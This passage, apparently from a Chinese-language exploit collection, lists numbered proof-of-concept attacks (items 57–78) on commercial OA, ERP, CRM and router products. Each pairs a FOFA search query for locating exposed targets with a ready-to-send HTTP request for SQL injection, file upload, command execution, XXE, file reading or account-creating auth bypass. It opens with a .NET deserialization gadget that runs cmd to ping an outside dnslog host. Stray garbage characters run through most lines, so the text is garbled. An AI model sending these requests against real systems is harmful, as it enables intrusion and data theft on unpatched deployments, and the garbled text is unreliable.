& Y2 ?+ A. O9 p "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
& i0 D8 n9 b6 z) e "MethodName":"Start",8 h& m2 I, P; K x
"ObjectInstance":{3 w3 S' x; W' z; k# q
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+ {1 z7 ?: ` ~# P0 E. V "StartInfo": {/ d. o, o/ z" }# e+ o. C" f; t5 a
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) H" d+ ~! I) i: z- v5 N$ N: E5 h
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"! ?' @; m5 s. _/ x& y
}
5 m' f9 @1 |- v% Q3 n) r; E- W }; x% F3 o4 U4 X9 _0 n+ E: d+ E
}8 {" ]( W( d. e5 I
}7 H0 J# b* P' a3 H9 x; Z
4 v/ U. Z: }# f4 l9 }" j
. x& `) O4 Q& R
57. 畅捷通T+ keyEdit.aspx SQL注入3 Z8 A% x7 f. j8 l- ~* W! [5 p
FOFA:app="畅捷通-TPlus"
0 }1 O" g! a) A: U% NGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1 C0 s- ?' o3 Y: L% Z
Host: host& y1 `! H! u9 c4 }8 J) g; t, ^
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36( V* H0 e2 l. d+ _
Accept-Charset: utf-8
) S7 e3 A* j( hAccept-Encoding: gzip, deflate
1 H) p6 K8 Q( U0 T$ b0 ZConnection: close0 R! i2 G4 q8 ^6 ]; S: |6 Q
3 V/ Q7 w, S' L3 U, u! w
1 D, W/ H# _9 [58. 畅捷通T+ KeyInfoList.aspx sql注入* ]/ \' g3 n' ~. [- R2 ~$ k
FOFA:app="畅捷通-TPlus", h' G, u/ t+ A; s" e# M
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.19 b4 ]& L0 v: v, p0 V% s
Host: your-ip: X8 Y4 ^! }2 X" j
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36! ]4 k% e9 ]6 a& t! V1 j% y
Accept-Charset: utf-8
3 t: e' A* s$ J6 X/ d; x, ]Accept-Encoding: gzip, deflate2 i( r! t: e8 j" p7 [
Connection: close
) b2 ]% L: ~$ h; e& o3 k) Y9 s
2 Y! }3 z s' D: j! P7 j) ]- A; z7 o9 I3 k' [/ d' n( n4 C/ `' M
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
5 v! S! ^" U7 p: A( T0 a4 l2 [FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"+ t! p5 ~6 }& }, @
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
- o+ C8 {9 Q# }7 u6 W1 fHost: 192.168.86.128:90906 w8 e# c% f2 `: R. {5 @, {
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.367 L$ b7 V1 @# ~2 s9 t @
Connection: close
/ d% O( d' h1 e: |2 lContent-Length: 16693 G4 f1 `; O$ m% h+ K$ x
Accept: */*
1 Z% [ @8 S, r, |, B$ e3 TAccept-Language: en
: c3 d) ?/ i" {6 GContent-Type: application/x-www-form-urlencoded0 `& B6 A% ] ^ H7 ]! M
Accept-Encoding: gzip- O s/ e/ G' f8 \ ]& V
1 B" e4 C5 |* J; A& H6 TPAYLOAD
\8 K3 v' A/ S, i! C0 V/ z
8 Q. ?7 w1 K4 [, |' J0 H8 B2 D9 R: e* ?) K
60. 百卓Smart管理平台 importexport.php SQL注入
3 _* O& Z2 |6 ~) _; UFOFA:title="Smart管理平台"
+ Z, q' v" G1 x% k0 E% {GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
. A2 V) n' N9 i5 n& P. @7 P* jHost:0 |% a3 F6 `* v# [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 }$ j4 n8 a8 ^% v, _& H" _/ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 n. ~+ O/ n: q
Accept-Encoding: gzip, deflate, k7 a8 U( V3 R* o3 K) ?
Accept-Language: zh-CN,zh;q=0.9
, d# @ S$ B9 O4 R1 b$ R" FConnection: close
4 a; d$ ^1 ^) w0 |0 y
4 v3 g- L+ L- f: Z# j
6 u. F' ]9 [# a: s61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
1 z" Z1 R2 }) y; B8 K+ A4 |+ vFOFA: title="欢迎使用浙大恩特客户资源管理系统") V3 { {/ Y- c I$ d- C6 F
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
5 \0 h% c. C" q) M( KHost: x.x.x.x! ]$ j* J4 V+ D" _& Z- l, \' V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 V2 @9 I0 q7 g# C3 K7 ]
Connection: close
$ z/ i4 `! q. p9 p- h0 L3 m6 VContent-Length: 27
~, s- `' L7 f+ JAccept: */*' I0 T/ D$ t8 y: `! U
Accept-Encoding: gzip, deflate
1 q+ E, R( g4 y8 b) L& nAccept-Language: en
n/ w5 M3 v( @/ MContent-Type: application/x-www-form-urlencoded
' b; I& P& k/ Q" N
$ ~0 i1 G% T4 C; O7 r" ^0 y8uxssX66eqrqtKObcVa0kid98xa
& [# D6 P8 N) p8 g! ?- v% j1 L& V0 Q" L: K7 T. M1 j
, l( W; |4 V+ n0 Y! p
62. IP-guard WebServer 远程命令执行; X/ I% D. g5 R. n- z
FOFA:"IP-guard" && icon_hash="2030860561"
3 ~, }) \! Q }7 ]5 y, xGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
0 d+ ~ B( K; Q) t/ RHost: x.x.x.x
7 C) X3 ?3 s9 u+ R' h+ O/ d! c2 TUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.369 E. v3 a0 o! |5 |' ]
Connection: close
0 O8 m: _7 J' H' c1 _6 xAccept: */*) H5 n9 ~; t. x o7 Q
Accept-Language: en; ]4 ?1 h5 h+ K6 z. K. w
Accept-Encoding: gzip
1 o; D: a$ Q' k5 L# v% \* s9 t3 H7 \2 p0 s9 I3 p! m" m
) m; M! f; h6 Y' G. h
访问7 X; w! N i5 N5 o: W9 a7 N l
1 T/ o, w2 h0 w( T7 v2 {" g
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
. F# O' U! [0 dHost: x.x.x.x, c* | k* h8 L) c7 j" U
: x3 ~, ?3 E" r* H$ K5 a$ v8 @
; z: h# \8 G4 R; m7 A63. IP-guard WebServer任意文件读取6 C$ b$ P X+ v- w* s( h
IP-guard < 4.82.0609.02 v+ ]6 X0 R( T; `
FOFA:icon_hash="2030860561"
0 o5 h- a2 e! _$ z% \' N3 UPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
, H7 u2 U1 [) CHost: your-ip! e9 k, Y" s! P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) ]! ^6 y* H8 y- F, nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( U; [: C$ A+ W% m5 X. ?) P% r
Accept-Encoding: gzip, deflate
% U# Z. x* g2 ]) SAccept-Language: zh-CN,zh;q=0.9
. m; l l$ F H: p& L" SConnection: close
2 Y3 z4 N: z: X5 N3 }% OContent-Type: application/x-www-form-urlencoded
" |" n2 h" O. ]% Z, K0 N1 x/ C. i; u
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A/ T. o2 v/ r' K9 Z: W; G
7 y! f. q5 {0 u5 d
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
7 \6 C1 T9 [7 Q) UFOFA:body="/Scripts/EnjoyMsg.js"! u: n3 y }: D) n" h- {
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1# c3 }# P0 n* W' l5 d) J
Host: 192.168.86.128:90019 c% P2 P0 w' k. c0 J6 O' o5 E# A
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
8 m: P/ |: D2 G3 |6 }) qConnection: close
& b$ e; p2 |, y: ^Content-Length: 3691 g* k+ @( Q N U
Accept: */*
7 q* D4 n1 B4 Z1 N9 sAccept-Language: en. \/ P$ |6 m( I& }
Content-Type: text/xml; charset=utf-88 ^! Q( X7 ~* F- _1 d5 T% {
Accept-Encoding: gzip
) p7 U5 N- [* f0 n- o" z3 z3 m4 n" B9 U9 @- m8 x3 q
<?xml version="1.0" encoding="utf-8"?>, v8 w% f* x# z; @
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
* {' m* v6 N7 d6 W<soap:Body>7 }! i- V0 V, ?' L% C
<GetOSpById xmlns="http://tempuri.org/">
6 S" H* @' J5 l/ v' v K% S- n <sId>1';waitfor delay '0:0:5'--+</sId>! h% y. g2 y2 H
</GetOSpById>
7 S4 R( R \4 U# C. C q: J8 g </soap:Body>/ j3 i& ^/ a \
</soap:Envelope>
, R# _& J! a8 n6 g, ~: G m& ^6 u% n6 m: q
; e1 c4 T% Y% m$ Z) q8 n65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过$ ^% k3 U3 C7 y% B" o0 }
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
) C$ c0 @% d& l& A) u响应200即成功创建账号test123456/1234569 D3 l1 }$ T; M) L$ b
POST /SystemMng.ashx HTTP/1.1 ~, @& D9 z: j6 b
Host:; `3 y% `( y. Q7 ~+ D8 C
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)( U$ h# P. B7 G: g1 @1 x! S6 z: k
Accept-Encoding: gzip, deflate
) ^5 I- B- E+ M1 aAccept: */** p% q) {" w$ ]5 | g- H3 F
Connection: close" x0 ]- R9 y' x( D$ j
Accept-Language: en
/ k w- T2 ]* w; A( } z! OContent-Length: 174
8 T, x6 D; ~( @$ K3 O/ a: H( p G# H, x
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators1 C% \: |1 u1 N/ }5 L. [3 }
1 b- i# h* O0 N) ` {* Z" ]
' K/ r% W3 X4 t: q7 Y; o66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入" M5 f2 m+ U$ A( N/ e$ S0 Q
FOFA:app="万户ezOFFICE协同管理平台"
# [& v0 ~0 w) P9 A. J8 A7 p
) v$ l3 P0 C" r- @: e" UGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1 q& f4 F7 N) M9 a9 ~/ d
Host: x.x.x.x- p* b' N- k* F# @) w: t/ ]( J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' ^, X' Y. N0 J) A9 gConnection: close/ j4 e) ?" u. M7 }/ v
Accept: */*
, c# o* E' |) x+ D/ G5 iAccept-Language: en; O# g! v- @) O9 B; Z
Accept-Encoding: gzip7 {5 w( X. Z: `7 J
% f4 O7 K, Q+ F1 t% b: J
5 l5 w+ z: h2 v9 z: h第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
$ J+ G! X6 V( C) W0 j( f" ]' z
67. 万户ezOFFICE wpsservlet任意文件上传
' g& ~6 ~4 j1 r& x! u6 H ]FOFA:app="万户网络-ezOFFICE", ]/ H7 R6 s: l! y3 k$ g/ G0 I
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型, @" G- b" _' w/ ?* f
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1% Q7 [$ M5 a) D3 q1 P
Host: x.x.x.x
" @8 m0 h( L+ M0 b+ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
( A# d2 K" O6 t) L) oContent-Length: 1738 [% X9 W9 B: @! N, m. Z7 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# q. j+ a1 h% `+ F6 oAccept-Encoding: gzip, deflate
9 R- ^# w1 y% \7 f+ A, a+ dAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
" m4 x) r3 c8 \) E6 e* q2 W3 iConnection: close
/ t- L* Y U/ fContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp V5 [* l. P, ]4 e
DNT: 1
+ D/ e( Z, E7 qUpgrade-Insecure-Requests: 1- N- M* `* B1 p. l- H/ J& ]/ M4 A
$ f, x! b. @- B1 T: H1 i$ W
--ufuadpxathqvxfqnuyuqaozvseiueerp& \5 a9 S! \; C4 D
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
8 H# F" ~$ e# V" v: A# P/ y- h% `- w2 e! M( b8 Q2 v4 {1 j
<% out.print("sasdfghjkj");%>
, w# b% D; Z* i; T: v: V$ J0 E--ufuadpxathqvxfqnuyuqaozvseiueerp--
% t" B+ g5 Z- c+ H3 t; L
( J' d P$ Y K; x) S1 B6 n
4 _+ k. z& h! i+ q+ C2 u. @6 u: o文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp& p: _$ i5 H" V8 h7 j
/ z& y6 T9 _5 J
68. 万户ezOFFICE wf_printnum.jsp SQL注入
! y4 \* B! o' t! _6 X9 a) {FOFA:app="万户ezOFFICE协同管理平台"# v* h t, l1 _% d1 V8 s- H: S
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.16 A6 Q2 U. F0 V7 f U
Host: {{host}}9 p: Y" T* d+ |. l$ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36/ [2 n; m6 e6 r; M5 Z7 i
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8/ ] E2 l( U- G$ l
Accept-Encoding: gzip, deflate6 R/ F' a$ u2 S
Accept-Language: zh-CN,zh;q=0.9+ Y7 C: _( T$ B2 Z4 n) S# R
Connection: close
" d3 a L$ ^! P% f8 y
' A0 S& K; g, Z
+ J6 u# N& L& L+ n: S! R& P69. 万户 ezOFFICE contract_gd.jsp SQL注入$ d$ a* Q6 U) @! a$ ?
FOFA:app="万户ezOFFICE协同管理平台"8 d7 \5 r2 K7 ^3 m9 F% D' ]5 w
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.15 G, J3 }" M6 w
Host: your-ip
! O* q! s9 K% d# h3 k* aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 l) R& E' O& F) i# V" a% N) tAccept-Encoding: gzip, deflate- Q: J5 j1 B4 ]$ k1 [
Accept: */*
7 l3 D. P1 i! u# M6 XConnection: keep-alive
0 Z- T) J$ L4 k# M, O; [% }, R- O
3 q# k2 x9 c4 i8 h! x9 S' U
9 _1 c9 E& Y$ Z- I7 e8 D; b70. 万户ezEIP success 命令执行4 ^6 K, I4 `% }# `/ C+ S
FOFA:app="万户网络-ezEIP"- b4 _- W, ~5 a2 [1 A1 w
POST /member/success.aspx HTTP/1.1# X* f: [( F1 u7 J7 r. f
Host: {{Hostname}}0 l2 _, g5 Y, R3 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 V0 \5 L: L% V9 ?/ }0 aSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=5 p4 z$ x2 r1 H7 I
Content-Type: application/x-www-form-urlencoded' |& s4 n$ f; R- h; d; i
TYPE: C
8 h, U: L' m0 S7 C/ z: bContent-Length: 16702% P. f" y4 ? q2 b
, e3 p: j, u4 R, \! y* {! X
__VIEWSTATE=PAYLOAD. Z8 Q" e3 N0 z$ R
" Z) A$ v0 W% t' r6 w4 Q. I/ M7 b% k- d
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入. R' K$ A# G3 X
FOFA:body="PM2项目管理系统BS版增强工具.zip"
: z7 H+ `( j ?GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1 _# E2 I6 P, p' k
Host: x.x.x.xx.x.x.x
3 l- Z: X6 l' O6 y( _8 I2 OUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 V8 j8 e1 s$ R" lConnection: close
3 Q& g5 k8 _! g! B6 h# SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ O. k& h2 p- U& I) j
Accept-Encoding: gzip, deflate; H2 C9 r3 [3 V& S; U0 g% D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 N# c4 \8 k% Z) ?. T3 x, |6 IUpgrade-Insecure-Requests: 1
# u ^' J! ^3 T9 W0 }" R e, _4 Q, j& r3 N+ M# _5 C7 i
) r( @5 f! a2 {; k t( e. h
72. 致远OA getAjaxDataServlet XXE: s Y: ?1 R7 g7 ^
FOFA:app="致远互联-OA", i: N Q: d9 _/ g7 s
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1- i# P1 z8 E3 I& `" {- U( f
Host: 192.168.40.131:8099
! k' A. i- @* j9 Z+ hUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.366 l8 i5 @$ P: s: ^& x6 [
Connection: close) k. f; a( C5 t3 w3 N. O, c
Content-Length: 583
, ^3 s2 a2 L0 I2 |: B. ^Content-Type: application/x-www-form-urlencoded. f' t( _% _, j; S7 U
Accept-Encoding: gzip
: i3 g0 j3 {/ L9 c& a! [8 {. e$ X( _- B, M: ^
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
9 V' K) o1 h% ~3 W! p5 m
# N$ q* T. |; A# J( T# t4 l0 g
, ` d+ c% N, B" ?73. GeoServer wms远程代码执行
: d7 C6 e2 P4 _, I: Q) c+ pFOFA:icon_hash=”97540678”; u1 h8 n% n9 }+ V
POST /geoserver/wms HTTP/1.1
# _+ l: L6 [2 `3 V/ fHost:6 |0 z# U! h$ ?6 A3 L5 x4 o" n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
* M! I: ~+ }! D* qContent-Length: 19819 ^& d9 T2 v& `; Y& S. O
Accept-Encoding: gzip, deflate8 E l7 P9 A3 z( @0 L
Connection: close
3 D7 v/ p; p7 G) q* `) Y& HContent-Type: application/xml" z# X1 U/ \: H/ \$ I y
SL-CE-SUID: 3
* t! C$ Z3 X$ F1 K I. r5 e( G
4 P! ^: s8 B7 TPAYLOAD
' g% P6 S M5 ]. K r$ X
7 v/ s- |% d$ T ^8 \
( d v! t' a" g9 Y0 j74. 致远M3-server 6_1sp1 反序列化RCE$ E7 |* P6 S5 m1 U
FOFA:title="M3-Server"
5 U8 I. \: h+ h$ h/ p2 aPAYLOAD
* _' z: ^3 G' R2 d' }8 {: M3 p, }$ ]; r
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
* M' ^, _: ]+ u- ^, R; c4 e$ `$ V! QFOFA:app="TELESQUARE-TLR-2005KSH"5 [5 L, y7 z/ ~- P; }: \
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
_+ W5 y! B5 H% j( AHost: x.x.x.x/ ] c7 u( v2 T8 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 n6 Q! i$ Z4 kConnection: close( t6 z% A9 F% b
Accept: */*
0 b/ L8 t5 c# o" V- t& CAccept-Language: en4 W: q# r; U7 s w7 S6 h2 J
Accept-Encoding: gzip- v E' W& @4 L' S+ d7 H& y7 c N
& J7 m: v) v8 j" s/ O$ g0 k0 K$ P$ L9 ]5 O+ b' a+ E& S! J* ~* |
GET /cgi-bin/test28256.txt HTTP/1.1: N% E7 m! m6 S- d- e
Host: x.x.x.x/ k; J7 t6 }: R5 ^0 q
9 K; P: q1 [4 F
( I. m5 r) q- w+ T+ V
76. 新开普掌上校园服务管理平台service.action远程命令执行
' \$ i- \2 ?% H) b$ PFOFA:title="掌上校园服务管理平台"4 @0 p! Q' Q5 E+ q) ~
POST /service_transport/service.action HTTP/1.1% ]/ q% K; W" a9 d: {' C+ ]
Host: x.x.x.x3 `+ g" y" M5 s' c; }) b$ H* h, _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03 \# G. j" L8 M% g3 {2 X
Connection: close
3 A( U, _2 N* j: ~) }Content-Length: 2110 ^: z2 p3 R: E5 e9 h0 U1 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
`( ^6 t6 T: c( a! W6 `Accept-Encoding: gzip, deflate, _& U1 D- ]$ |& t: a5 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ z, q% U; B; F3 U6 h% {
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A40 j7 V4 J( m7 D; {1 v$ s6 m
Upgrade-Insecure-Requests: 1( S5 G( P' i) H$ l `4 t4 ]
# ` d" S+ I* C8 I( g+ e7 w{3 C" ?; K* {4 g {
"command": "GetFZinfo",7 h. q# U8 L' Q8 C T
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"/ @) s4 l& t( k% N& O0 I& j- B1 {
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
, d: U+ }$ ^, z& D/ ?9 y}
9 c9 t3 j2 s! I+ k6 |
: K. ~. h. J2 k' ?4 _5 S/ E( y
+ z2 `3 D5 B/ B/ j2 n, | z! pGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1& v! _! }% w' d4 ]. X/ b y
Host: x.x.x.x$ ?& E( ~ D. P
! `; _3 d2 W# ?* B
n& _7 t# Q% Y
7 g& z8 Q! M0 I
77. F22服装管理软件系统UploadHandler.ashx任意文件上传1 [/ ^9 d7 H5 s6 C* x: ~0 x. S
FOFA:body="F22WEB登陆"
1 O, T# w, f& }( e1 t: g+ ePOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.17 U9 _& ?2 r" f8 z. }" N
Host: x.x.x.x$ c& o( w. ^! x: E) H& N$ Q& j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 x# y8 w, X0 x1 B' `% |Connection: close2 {- U/ N3 T" B/ p; o0 U2 E, @. s& G7 J
Content-Length: 433
, }+ Q2 n: |5 J# J6 K$ @Accept: */*2 C7 y1 F- _8 `
Accept-Encoding: gzip, deflate
B7 p) Z. d) m/ x( DAccept-Language: zh-CN,zh;q=0.9
3 ]7 L, t* P2 M0 O& z2 }Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix9 ~( x8 `" T+ ?4 h
, j# J+ m) ~/ l4 x
------------398jnjVTTlDVXHlE7yYnfwBoix
/ |- b F1 R; AContent-Disposition: form-data; name="folder"
4 ?/ h7 w; y$ U" g: t1 X L+ C/ `# Z; V2 O; B' Q3 ^1 }2 w' C
/upload/udplog) I, k4 |. _- u; e
------------398jnjVTTlDVXHlE7yYnfwBoix
% s/ r- n8 a' S0 O' QContent-Disposition: form-data; name="Filedata"; filename="1.aspx"" n0 `! p/ c3 l8 Z) c. _% A1 q* w4 o$ w
Content-Type: application/octet-stream
/ g$ B8 w1 M0 \0 H$ {; g8 r/ p0 a+ u3 F/ Y: }5 L+ E- a! O
hello1234567' M/ Q/ M. h9 ?9 E5 Q2 b- W* c
------------398jnjVTTlDVXHlE7yYnfwBoix
3 R0 h$ j! G. s* H% ^6 aContent-Disposition: form-data; name="Upload"% D1 A0 Y4 {) x4 V. D- N$ w
# Y/ O0 V. Q" V. a& MSubmit Query
V7 k3 u$ ]( V o" C8 K------------398jnjVTTlDVXHlE7yYnfwBoix--
7 u- N& O1 ], Q/ F" T) ~: _6 l; O. b7 X! @( P
+ d+ d/ U/ @& a& i
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
! e' }7 `. N- W; n& ZFOFA:icon_hash="2001627082" x% ]9 x7 p& Y* U, ?1 d# a2 p1 P
POST /Platform/System/FileUpload.ashx HTTP/1.1
* S4 o# t" B: ZHost: x.x.x.x
# G6 l/ ]* M2 A2 v3 Q! I/ JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& f: t' W$ L& \! a2 {" s2 x
Connection: close
x; I6 m8 F4 n& M, y' ~. qContent-Length: 336' c' C, o* }$ Y
Accept-Encoding: gzip
& [4 P" W% R$ P% y' x+ lContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l: b3 O! b% ~# f) x
9 `( ~2 W; L6 S" X+ S' s2 w------YsOxWxSvj1KyZow1PTsh98fdu6l
3 z4 z. O4 ^# a3 N) DContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
: J! f/ ?, T c+ nContent-Type: image/png8 x" D/ j: m; w' w. I
; R2 G$ c& I5 \YsOxWxSvj1KyZow1PTsh98fdu6l) g$ R+ u; j! {3 k4 O
------YsOxWxSvj1KyZow1PTsh98fdu6l* V! G- Z E3 T5 A
Content-Disposition: form-data; name="target"+ A! v8 A" K3 e0 m5 r1 v, \
& m2 Z% m0 z% Y: I
/Applications/SkillDevelopAndEHS/' u v; g, D* r; L# _) V
------YsOxWxSvj1KyZow1PTsh98fdu6l--
# F' `: X+ [# D' `* f1 ^7 e! O6 J f* n1 D/ I
+ l- Z; W9 C7 e* l' G, |GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1* y% \8 d0 R/ L. L4 M6 z/ J9 I
Host: x.x.x.x4 \0 v" y5 l! J# j9 }! D' [, d! v
